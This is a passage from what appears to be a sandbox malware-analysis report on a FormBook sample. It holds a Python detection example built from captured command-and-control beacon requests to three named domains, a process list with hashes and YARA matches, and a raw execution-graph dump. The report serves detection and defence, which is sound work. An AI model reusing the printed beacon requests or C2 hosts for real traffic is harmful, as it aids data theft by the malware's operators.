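where the report shows them in clear text); the rotation threshold and the parking-page check are this example's own assumptions.

```python
"""Added example (not from the report or the sample): derive the beacon
signature seen in sessions 47-50 and flag the domain rotation it shows."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# User-Agent sent on every request in sessions 47-50 (copied verbatim).
OBSERVED_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
               ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
               "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")

# Constructed from the captured sessions. body_hex is the start of each POST's
# "Data Raw" line (enough to recover the form field name); response_snippet is
# the start of each 404 body where the report shows it in clear text (the two
# gzip-chunked bodies are left empty).
CAPTURED = [
    {"ts": "18:03:05.966", "request": "POST /fo8o/ HTTP/1.1", "host": "www.b301.space",
     "ua": OBSERVED_UA, "body_hex": "5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f",
     "status": 404, "response_snippet": ""},
    {"ts": "18:03:08.507", "request": "POST /fo8o/ HTTP/1.1", "host": "www.b301.space",
     "ua": OBSERVED_UA, "body_hex": "5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f",
     "status": 404, "response_snippet": ""},
    {"ts": "18:03:11.051",
     "request": "GET /fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/"
                "xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ="
                "&Pbw=PLVXbnG85 HTTP/1.1",
     "host": "www.b301.space", "ua": OBSERVED_UA, "body_hex": "", "status": 404,
     "response_snippet": '<!doctype html><html class="is_adaptive" lang="ru"><head>'
                         '<meta charset="UTF-8"><meta name="parking" content="regru-rdap">'},
    {"ts": "18:03:20.161",
     "request": "GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeF"
                "tQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c="
                "&Pbw=PLVXbnG85 HTTP/1.1",
     "host": "www.3xfootball.com", "ua": OBSERVED_UA, "body_hex": "", "status": 404,
     "response_snippet": "<html><head><title>404 Not Found</title></head>"},
    {"ts": "18:03:27.673", "request": "POST /fo8o/ HTTP/1.1", "host": "www.kasegitai.tokyo",
     "ua": OBSERVED_UA, "body_hex": "5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b",
     "status": 404, "response_snippet": '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'},
]


def decode_hex(hex_bytes: str) -> str:
    """Turn a "Data Raw" hex dump into text; non-ASCII bytes become U+FFFD."""
    return bytes.fromhex(hex_bytes.replace(" ", "")).decode("ascii", errors="replace")


def request_target(req):
    """Split the request line into (method, request-target)."""
    method, target, _version = req["request"].split(" ", 2)
    return method, target


def form_keys(req):
    """Parameter names of the beacon: query string for GET, form body for POST."""
    method, target = request_target(req)
    qs = urlsplit(target).query if method == "GET" else decode_hex(req["body_hex"])
    return list(parse_qs(qs, keep_blank_values=True))


def beacon_signature(req):
    """Path plus first parameter name; both are constant across the five requests above."""
    _method, target = request_target(req)
    keys = form_keys(req)
    return (urlsplit(target).path, keys[0] if keys else None)


def hosts_by_signature(reqs):
    """Group the Host values seen per (path, parameter) signature."""
    groups = defaultdict(set)
    for r in reqs:
        groups[beacon_signature(r)].add(r["host"])
    return {sig: sorted(hosts) for sig, hosts in groups.items()}


def is_parked(snippet: str) -> bool:
    """Registrar parking page, as in the www.b301.space 404 body (assumed marker)."""
    return 'name="parking"' in snippet


def summarize(reqs, min_hosts=3):
    """Assumed heuristic: one signature against >= min_hosts domains is rotation."""
    groups = hosts_by_signature(reqs)
    sig, hosts = max(groups.items(), key=lambda kv: len(kv[1]))
    return {
        "signature": sig,
        "hosts": hosts,
        "rotation": len(hosts) >= min_hosts,
        "all_404": all(r["status"] == 404 for r in reqs),
        "uniform_ua": len({r["ua"] for r in reqs}) == 1,
        "parked_hosts": sorted({r["host"] for r in reqs if is_parked(r["response_snippet"])}),
    }


if __name__ == "__main__":
    for key, value in summarize(CAPTURED).items():
        print(f"{key}: {value}")
```

Keying a detection on the path and parameter name alone is brittle (both are per-build values), which is why the summary also reports the uniform User-Agent, the all-404 outcome and the parked decoy: a client that hammers one URI pattern across unrelated domains, never gets anything but 404, and still keeps going is the durable signal here.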

                                                    Target ID:0
                                                    Start time:11:59:18
                                                    Start date:09/06/2024
                                                    Path:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\opp46lGmxd.exe"
                                                    Imagebase:0xa60000
                                                    File size:1'161'728 bytes
                                                    MD5 hash:0F399D1B3A7C6DD28867095C2BDB2098
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:11:59:19
                                                    Start date:09/06/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\opp46lGmxd.exe"
                                                    Imagebase:0x560000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:11:59:27
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:11:59:28
                                                    Start date:09/06/2024
                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                    Imagebase:0x180000
                                                    File size:22'016 bytes
                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:11:59:42
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe"
                                                    Imagebase:0xb40000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:11:59:55
                                                    Start date:09/06/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6de060000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:2.6%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:174
execution_graph: node and edge listing of the rendered execution graph (graph image not recoverable from text extraction; node list omitted)
calls __ftell_nolock 100053->100098 100056 a854f5 100057 a8550b 100056->100057 100058 a854fe 100056->100058 100060 a85535 100057->100060 100061 a85515 100057->100061 100099 a88d68 58 API calls __getptd_noexit 100058->100099 100082 a90857 100060->100082 100100 a88d68 58 API calls __getptd_noexit 100061->100100 100063 a854cf __initptd @_EH4_CallFilterFunc@8 100063->100004 100068 a90744 __initptd 100067->100068 100069 a89e4b __lock 58 API calls 100068->100069 100080 a90752 100069->100080 100070 a907c6 100102 a9084e 100070->100102 100071 a907cd 100072 a88a5d __malloc_crt 58 API calls 100071->100072 100074 a907d4 100072->100074 100074->100070 100107 a8a06b InitializeCriticalSectionAndSpinCount 100074->100107 100075 a90843 __initptd 100075->100056 100077 a89ed3 __mtinitlocknum 58 API calls 100077->100080 100079 a907fa EnterCriticalSection 100079->100070 100080->100070 100080->100071 100080->100077 100105 a86e8d 59 API calls __lock 100080->100105 100106 a86ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100080->100106 100090 a90877 __wopenfile 100082->100090 100083 a90891 100112 a88d68 58 API calls __getptd_noexit 100083->100112 100085 a90896 100113 a88ff6 9 API calls __ftell_nolock 100085->100113 100087 a85540 100101 a85562 LeaveCriticalSection LeaveCriticalSection _fseek 100087->100101 100088 a90aaf 100109 a987f1 100088->100109 100090->100083 100096 a90a4c 100090->100096 100114 a83a0b 60 API calls 2 library calls 100090->100114 100092 a90a45 100092->100096 100115 a83a0b 60 API calls 2 library calls 100092->100115 100094 a90a64 100094->100096 100116 a83a0b 60 API calls 2 library calls 100094->100116 100096->100083 100096->100088 100097->100053 100098->100063 100099->100063 100100->100063 100101->100063 100108 a89fb5 LeaveCriticalSection 100102->100108 100104 a90855 100104->100075 100105->100080 100106->100080 100107->100079 100108->100104 100117 a97fd5 100109->100117 100111 a9880a 100111->100087 100112->100085 100113->100087 100114->100092 100115->100094 
100116->100096 100118 a97fe1 __initptd 100117->100118 100119 a97ff7 100118->100119 100122 a9802d 100118->100122 100202 a88d68 58 API calls __getptd_noexit 100119->100202 100121 a97ffc 100203 a88ff6 9 API calls __ftell_nolock 100121->100203 100128 a9809e 100122->100128 100125 a98049 100204 a98072 LeaveCriticalSection __unlock_fhandle 100125->100204 100127 a98006 __initptd 100127->100111 100129 a980be 100128->100129 100130 a8471a __wsopen_nolock 58 API calls 100129->100130 100133 a980da 100130->100133 100131 a89006 __invoke_watson 8 API calls 100132 a987f0 100131->100132 100134 a97fd5 __wsopen_helper 103 API calls 100132->100134 100135 a98114 100133->100135 100146 a98137 100133->100146 100151 a98211 100133->100151 100136 a9880a 100134->100136 100137 a88d34 __chsize_nolock 58 API calls 100135->100137 100136->100125 100138 a98119 100137->100138 100139 a88d68 __ftell_nolock 58 API calls 100138->100139 100140 a98126 100139->100140 100142 a88ff6 __ftell_nolock 9 API calls 100140->100142 100141 a981f5 100143 a88d34 __chsize_nolock 58 API calls 100141->100143 100144 a98130 100142->100144 100145 a981fa 100143->100145 100144->100125 100147 a88d68 __ftell_nolock 58 API calls 100145->100147 100146->100141 100149 a981d3 100146->100149 100148 a98207 100147->100148 100150 a88ff6 __ftell_nolock 9 API calls 100148->100150 100152 a8d4d4 __alloc_osfhnd 61 API calls 100149->100152 100150->100151 100151->100131 100153 a982a1 100152->100153 100154 a982ab 100153->100154 100155 a982ce 100153->100155 100157 a88d34 __chsize_nolock 58 API calls 100154->100157 100156 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100155->100156 100167 a982f0 100156->100167 100158 a982b0 100157->100158 100160 a88d68 __ftell_nolock 58 API calls 100158->100160 100159 a9836e GetFileType 100162 a98379 GetLastError 100159->100162 100163 a983bb 100159->100163 100161 a982ba 100160->100161 100165 a88d68 __ftell_nolock 58 API calls 100161->100165 100166 a88d47 __dosmaperr 58 API calls 100162->100166 
100174 a8d76a __set_osfhnd 59 API calls 100163->100174 100164 a9833c GetLastError 100168 a88d47 __dosmaperr 58 API calls 100164->100168 100165->100144 100169 a983a0 CloseHandle 100166->100169 100167->100159 100167->100164 100170 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100167->100170 100171 a98361 100168->100171 100169->100171 100172 a983ae 100169->100172 100173 a98331 100170->100173 100175 a88d68 __ftell_nolock 58 API calls 100171->100175 100176 a88d68 __ftell_nolock 58 API calls 100172->100176 100173->100159 100173->100164 100179 a983d9 100174->100179 100175->100151 100177 a983b3 100176->100177 100177->100171 100178 a98594 100178->100151 100181 a98767 CloseHandle 100178->100181 100179->100178 100180 a91b11 __lseeki64_nolock 60 API calls 100179->100180 100199 a9845a 100179->100199 100182 a98443 100180->100182 100183 a97f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100181->100183 100185 a88d34 __chsize_nolock 58 API calls 100182->100185 100182->100199 100184 a9878e 100183->100184 100187 a987c2 100184->100187 100188 a98796 GetLastError 100184->100188 100185->100199 100186 a910ab 70 API calls __read_nolock 100186->100199 100187->100151 100189 a88d47 __dosmaperr 58 API calls 100188->100189 100191 a987a2 100189->100191 100190 a9848c 100193 a999f2 __chsize_nolock 82 API calls 100190->100193 100190->100199 100194 a8d67d __free_osfhnd 59 API calls 100191->100194 100192 a90d2d __close_nolock 61 API calls 100192->100199 100193->100190 100194->100187 100195 a8dac6 __write 78 API calls 100195->100199 100196 a98611 100197 a90d2d __close_nolock 61 API calls 100196->100197 100200 a98618 100197->100200 100198 a91b11 60 API calls __lseeki64_nolock 100198->100199 100199->100178 100199->100186 100199->100190 100199->100192 100199->100195 100199->100196 100199->100198 100201 a88d68 __ftell_nolock 58 API calls 100200->100201 100201->100151 100202->100121 100203->100127 100204->100127 100206 a64ce1 100205->100206 100207 a64d9d LoadLibraryA 
100205->100207 100206->100008 100206->100009 100207->100206 100208 a64dae GetProcAddress 100207->100208 100208->100206 100210 a80ff6 Mailbox 59 API calls 100209->100210 100211 a653a0 100210->100211 100211->100016 100213 a65003 FindResourceExW 100212->100213 100215 a65020 100212->100215 100214 a9dd5c LoadResource 100213->100214 100213->100215 100214->100215 100216 a9dd71 SizeofResource 100214->100216 100215->100017 100216->100215 100217 a9dd85 LockResource 100216->100217 100217->100215 100219 a65054 100218->100219 100222 a9ddd4 100218->100222 100224 a85a7d 100219->100224 100221 a65062 100221->100028 100223->100017 100228 a85a89 __initptd 100224->100228 100225 a85a9b 100237 a88d68 58 API calls __getptd_noexit 100225->100237 100227 a85ac1 100239 a86e4e 100227->100239 100228->100225 100228->100227 100229 a85aa0 100238 a88ff6 9 API calls __ftell_nolock 100229->100238 100232 a85ac7 100245 a859ee 83 API calls 3 library calls 100232->100245 100234 a85ad6 100246 a85af8 LeaveCriticalSection LeaveCriticalSection _fseek 100234->100246 100236 a85aab __initptd 100236->100221 100237->100229 100238->100236 100240 a86e5e 100239->100240 100241 a86e80 EnterCriticalSection 100239->100241 100240->100241 100242 a86e66 100240->100242 100243 a86e76 100241->100243 100244 a89e4b __lock 58 API calls 100242->100244 100243->100232 100244->100243 100245->100234 100246->100236 100250 a8582d 100247->100250 100249 a6508e 100249->100036 100251 a85839 __initptd 100250->100251 100252 a8587c 100251->100252 100253 a8584f _memset 100251->100253 100255 a85874 __initptd 100251->100255 100254 a86e4e __lock_file 59 API calls 100252->100254 100277 a88d68 58 API calls __getptd_noexit 100253->100277 100256 a85882 100254->100256 100255->100249 100263 a8564d 100256->100263 100259 a85869 100278 a88ff6 9 API calls __ftell_nolock 100259->100278 100267 a85668 _memset 100263->100267 100270 a85683 100263->100270 100264 a85673 100375 a88d68 58 API calls __getptd_noexit 100264->100375 100266 a85678 100376 a88ff6 9 API 
calls __ftell_nolock 100266->100376 100267->100264 100267->100270 100274 a856c3 100267->100274 100279 a858b6 LeaveCriticalSection LeaveCriticalSection _fseek 100270->100279 100271 a857d4 _memset 100378 a88d68 58 API calls __getptd_noexit 100271->100378 100274->100270 100274->100271 100280 a84916 100274->100280 100287 a910ab 100274->100287 100355 a90df7 100274->100355 100377 a90f18 58 API calls 3 library calls 100274->100377 100277->100259 100278->100255 100279->100255 100281 a84920 100280->100281 100282 a84935 100280->100282 100379 a88d68 58 API calls __getptd_noexit 100281->100379 100282->100274 100284 a84925 100380 a88ff6 9 API calls __ftell_nolock 100284->100380 100286 a84930 100286->100274 100288 a910cc 100287->100288 100289 a910e3 100287->100289 100390 a88d34 58 API calls __getptd_noexit 100288->100390 100291 a9181b 100289->100291 100296 a9111d 100289->100296 100405 a88d34 58 API calls __getptd_noexit 100291->100405 100293 a910d1 100391 a88d68 58 API calls __getptd_noexit 100293->100391 100294 a91820 100406 a88d68 58 API calls __getptd_noexit 100294->100406 100298 a91125 100296->100298 100303 a9113c 100296->100303 100392 a88d34 58 API calls __getptd_noexit 100298->100392 100299 a91131 100407 a88ff6 9 API calls __ftell_nolock 100299->100407 100301 a9112a 100393 a88d68 58 API calls __getptd_noexit 100301->100393 100304 a91151 100303->100304 100307 a9116b 100303->100307 100308 a91189 100303->100308 100335 a910d8 100303->100335 100394 a88d34 58 API calls __getptd_noexit 100304->100394 100307->100304 100312 a91176 100307->100312 100309 a88a5d __malloc_crt 58 API calls 100308->100309 100310 a91199 100309->100310 100313 a911bc 100310->100313 100314 a911a1 100310->100314 100381 a95ebb 100312->100381 100397 a91b11 60 API calls 3 library calls 100313->100397 100395 a88d68 58 API calls __getptd_noexit 100314->100395 100315 a9128a 100317 a91303 ReadFile 100315->100317 100322 a912a0 GetConsoleMode 100315->100322 100320 a917e3 GetLastError 100317->100320 100321 a91325 
100317->100321 100319 a911a6 100396 a88d34 58 API calls __getptd_noexit 100319->100396 100324 a917f0 100320->100324 100325 a912e3 100320->100325 100321->100320 100329 a912f5 100321->100329 100326 a91300 100322->100326 100327 a912b4 100322->100327 100403 a88d68 58 API calls __getptd_noexit 100324->100403 100338 a912e9 100325->100338 100398 a88d47 58 API calls 3 library calls 100325->100398 100326->100317 100327->100326 100330 a912ba ReadConsoleW 100327->100330 100337 a915c7 100329->100337 100329->100338 100340 a9135a 100329->100340 100330->100329 100332 a912dd GetLastError 100330->100332 100331 a917f5 100404 a88d34 58 API calls __getptd_noexit 100331->100404 100332->100325 100335->100274 100336 a82f95 _free 58 API calls 100336->100335 100337->100338 100342 a916cd ReadFile 100337->100342 100338->100335 100338->100336 100341 a913c6 ReadFile 100340->100341 100345 a91447 100340->100345 100343 a913e7 GetLastError 100341->100343 100346 a913f1 100341->100346 100348 a916f0 GetLastError 100342->100348 100354 a916fe 100342->100354 100343->100346 100344 a914f4 100400 a88d68 58 API calls __getptd_noexit 100344->100400 100345->100338 100345->100344 100349 a91504 100345->100349 100351 a914b4 MultiByteToWideChar 100345->100351 100346->100340 100399 a91b11 60 API calls 3 library calls 100346->100399 100348->100354 100349->100351 100401 a91b11 60 API calls 3 library calls 100349->100401 100351->100332 100351->100338 100354->100337 100402 a91b11 60 API calls 3 library calls 100354->100402 100356 a90e02 100355->100356 100360 a90e17 100355->100360 100441 a88d68 58 API calls __getptd_noexit 100356->100441 100358 a90e07 100442 a88ff6 9 API calls __ftell_nolock 100358->100442 100361 a90e12 100360->100361 100362 a90e4c 100360->100362 100443 a96234 100360->100443 100361->100274 100364 a84916 __ftell_nolock 58 API calls 100362->100364 100365 a90e60 100364->100365 100408 a90f97 100365->100408 100367 a90e67 100367->100361 100368 a84916 __ftell_nolock 58 API calls 100367->100368 100369 a90e8a 
100368->100369 100369->100361 100370 a84916 __ftell_nolock 58 API calls 100369->100370 100371 a90e96 100370->100371 100371->100361 100372 a84916 __ftell_nolock 58 API calls 100371->100372 100373 a90ea3 100372->100373 100374 a84916 __ftell_nolock 58 API calls 100373->100374 100374->100361 100375->100266 100376->100270 100377->100274 100378->100266 100379->100284 100380->100286 100382 a95ed3 100381->100382 100383 a95ec6 100381->100383 100385 a95edf 100382->100385 100386 a88d68 __ftell_nolock 58 API calls 100382->100386 100384 a88d68 __ftell_nolock 58 API calls 100383->100384 100387 a95ecb 100384->100387 100385->100315 100388 a95f00 100386->100388 100387->100315 100389 a88ff6 __ftell_nolock 9 API calls 100388->100389 100389->100387 100390->100293 100391->100335 100392->100301 100393->100299 100394->100301 100395->100319 100396->100335 100397->100312 100398->100338 100399->100346 100400->100338 100401->100351 100402->100354 100403->100331 100404->100338 100405->100294 100406->100299 100407->100335 100409 a90fa3 __initptd 100408->100409 100410 a90fb0 100409->100410 100411 a90fc7 100409->100411 100413 a88d34 __chsize_nolock 58 API calls 100410->100413 100412 a9108b 100411->100412 100414 a90fdb 100411->100414 100415 a88d34 __chsize_nolock 58 API calls 100412->100415 100416 a90fb5 100413->100416 100417 a90ff9 100414->100417 100418 a91006 100414->100418 100419 a90ffe 100415->100419 100420 a88d68 __ftell_nolock 58 API calls 100416->100420 100421 a88d34 __chsize_nolock 58 API calls 100417->100421 100422 a91028 100418->100422 100423 a91013 100418->100423 100427 a88d68 __ftell_nolock 58 API calls 100419->100427 100424 a90fbc __initptd 100420->100424 100421->100419 100426 a8d446 ___lock_fhandle 59 API calls 100422->100426 100425 a88d34 __chsize_nolock 58 API calls 100423->100425 100424->100367 100428 a91018 100425->100428 100429 a9102e 100426->100429 100430 a91020 100427->100430 100431 a88d68 __ftell_nolock 58 API calls 100428->100431 100432 a91041 100429->100432 100433 a91054 
100429->100433 100434 a88ff6 __ftell_nolock 9 API calls 100430->100434 100431->100430 100436 a910ab __read_nolock 70 API calls 100432->100436 100435 a88d68 __ftell_nolock 58 API calls 100433->100435 100434->100424 100438 a91059 100435->100438 100437 a9104d 100436->100437 100440 a91083 __read LeaveCriticalSection 100437->100440 100439 a88d34 __chsize_nolock 58 API calls 100438->100439 100439->100437 100440->100424 100441->100358 100442->100361 100444 a88a5d __malloc_crt 58 API calls 100443->100444 100445 a96249 100444->100445 100445->100362 100449 a8543a GetSystemTimeAsFileTime 100446->100449 100448 ac91f8 100448->100038 100450 a85468 __aulldiv 100449->100450 100450->100448 100452 a85e9c __initptd 100451->100452 100453 a85eae 100452->100453 100454 a85ec3 100452->100454 100465 a88d68 58 API calls __getptd_noexit 100453->100465 100455 a86e4e __lock_file 59 API calls 100454->100455 100457 a85ec9 100455->100457 100467 a85b00 67 API calls 3 library calls 100457->100467 100458 a85eb3 100466 a88ff6 9 API calls __ftell_nolock 100458->100466 100461 a85ed4 100468 a85ef4 LeaveCriticalSection LeaveCriticalSection _fseek 100461->100468 100463 a85ee6 100464 a85ebe __initptd 100463->100464 100464->100042 100465->100458 100466->100464 100467->100461 100468->100463 100469->99907 100470->99921 100471->99924 100472->99920 100473->99930 100475 a692c9 Mailbox 100474->100475 100476 a9f5c8 100475->100476 100481 a692d3 100475->100481 100477 a80ff6 Mailbox 59 API calls 100476->100477 100479 a9f5d4 100477->100479 100478 a692da 100478->99933 100481->100478 100482 a69df0 59 API calls Mailbox 100481->100482 100482->100481 100483->99944 100484->99941 100490 ac99d2 __tzset_nolock _wcscmp 100485->100490 100486 ac9866 100486->99950 100486->99976 100487 a6506b 74 API calls 100487->100490 100488 ac9393 GetSystemTimeAsFileTime 100488->100490 100489 a65045 85 API calls 100489->100490 100490->100486 100490->100487 100490->100488 100490->100489 100492 ac8d9b 100491->100492 100494 ac8da9 100491->100494 
100493 a8548b 115 API calls 100492->100493 100493->100494 100495 ac8dee 100494->100495 100496 a8548b 115 API calls 100494->100496 100517 ac8db2 100494->100517 100522 ac901b 100495->100522 100498 ac8dd3 100496->100498 100498->100495 100500 ac8ddc 100498->100500 100499 ac8e32 100501 ac8e36 100499->100501 100502 ac8e57 100499->100502 100505 a855d6 __fcloseall 83 API calls 100500->100505 100500->100517 100504 ac8e43 100501->100504 100507 a855d6 __fcloseall 83 API calls 100501->100507 100526 ac8c33 100502->100526 100510 a855d6 __fcloseall 83 API calls 100504->100510 100504->100517 100505->100517 100507->100504 100508 ac8e85 100535 ac8eb5 100508->100535 100509 ac8e65 100511 ac8e72 100509->100511 100513 a855d6 __fcloseall 83 API calls 100509->100513 100510->100517 100515 a855d6 __fcloseall 83 API calls 100511->100515 100511->100517 100513->100511 100515->100517 100517->99979 100519 ac8ea0 100519->100517 100521 a855d6 __fcloseall 83 API calls 100519->100521 100521->100517 100523 ac9040 100522->100523 100525 ac9029 __tzset_nolock _memmove 100522->100525 100524 a85812 __fread_nolock 74 API calls 100523->100524 100524->100525 100525->100499 100527 a8594c __malloc_crt 58 API calls 100526->100527 100528 ac8c42 100527->100528 100529 a8594c __malloc_crt 58 API calls 100528->100529 100530 ac8c56 100529->100530 100531 a8594c __malloc_crt 58 API calls 100530->100531 100532 ac8c6a 100531->100532 100533 ac8f97 58 API calls 100532->100533 100534 ac8c7d 100532->100534 100533->100534 100534->100508 100534->100509 100542 ac8eca 100535->100542 100536 ac8f82 100564 ac91bf 100536->100564 100538 ac8c8f 74 API calls 100538->100542 100539 ac8e8c 100543 ac8f97 100539->100543 100542->100536 100542->100538 100542->100539 100568 ac8d2b 74 API calls 100542->100568 100569 ac909c 80 API calls 100542->100569 100544 ac8faa 100543->100544 100545 ac8fa4 100543->100545 100547 ac8fbb 100544->100547 100548 a82f95 _free 58 API calls 100544->100548 100546 a82f95 _free 58 API calls 100545->100546 100546->100544 
100549 ac8e93 100547->100549 100550 a82f95 _free 58 API calls 100547->100550 100548->100547 100549->100519 100551 a855d6 100549->100551 100550->100549 100552 a855e2 __initptd 100551->100552 100553 a8560e 100552->100553 100554 a855f6 100552->100554 100556 a86e4e __lock_file 59 API calls 100553->100556 100560 a85606 __initptd 100553->100560 100671 a88d68 58 API calls __getptd_noexit 100554->100671 100558 a85620 100556->100558 100557 a855fb 100672 a88ff6 9 API calls __ftell_nolock 100557->100672 100655 a8556a 100558->100655 100560->100519 100565 ac91cc 100564->100565 100566 ac91dd 100564->100566 100570 a84a93 100565->100570 100566->100539 100568->100542 100569->100542 100571 a84a9f __initptd 100570->100571 100572 a84abd 100571->100572 100573 a84ad5 100571->100573 100575 a84acd __initptd 100571->100575 100595 a88d68 58 API calls __getptd_noexit 100572->100595 100576 a86e4e __lock_file 59 API calls 100573->100576 100575->100566 100577 a84adb 100576->100577 100583 a8493a 100577->100583 100578 a84ac2 100596 a88ff6 9 API calls __ftell_nolock 100578->100596 100585 a84949 100583->100585 100592 a84967 100583->100592 100584 a84957 100647 a88d68 58 API calls __getptd_noexit 100584->100647 100585->100584 100589 a84981 _memmove 100585->100589 100585->100592 100587 a8495c 100648 a88ff6 9 API calls __ftell_nolock 100587->100648 100589->100592 100593 a84916 